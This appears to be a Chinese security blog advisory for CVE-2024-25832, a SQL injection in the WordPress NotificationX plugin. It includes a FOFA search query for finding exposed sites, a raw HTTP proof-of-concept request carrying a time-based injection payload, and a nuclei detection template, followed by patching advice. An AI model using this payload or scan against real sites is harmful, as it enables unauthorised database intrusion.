WordPress Plugin SQL注入漏洞(CVE-2024-25832)

漏洞描述

WordPress Plugin是一种用于扩展和增强WordPress网站功能的软件插件。WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。此产品存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。

影响版本

WordPress Plugin NotificationX

产品界面

fofa语法

body="/wp-content/plugins/notificationx"

POC

 
  1. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  2. Host:
  3. Content-Type: application/json
  4. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

nuclei验证

 
  1. id: CVE-2024-25832
  2. info:
  3. name: WordPress Plugin SQL注入漏洞(CVE-2024-25832)
  4. author: nobody
  5. severity: high
  6. description: |
  7. WordPress Plugin 存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。
  8. impact: |
  9. 恶意攻击者可能会利用此漏洞获取服务器的敏感信息
  10. remediation: |
  11. 升级最新版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="/wp-content/plugins/notificationx"
  16. tags: CVE-2024-25832,sqli
  17. requests:
  18. - raw:
  19. - |-
  20. @timeout:10s
  21. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  22. Host: {{Hostname}}
  23. Content-Type: application/json
  24. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
  25. matchers:
  26. - type: dsl
  27. condition: and
  28. dsl:
  29. - "duration>=5"
  30. - status_code==200 && contains_all(body,'\{\"success\":true\}')

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  •    申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

    免费领取安全学习资料包!

    渗透工具

    技术文档、书籍

     

    面试题

    帮助你在面试中脱颖而出

    视频

    基础到进阶

    环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

     

    应急响应笔记

    学习路线

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值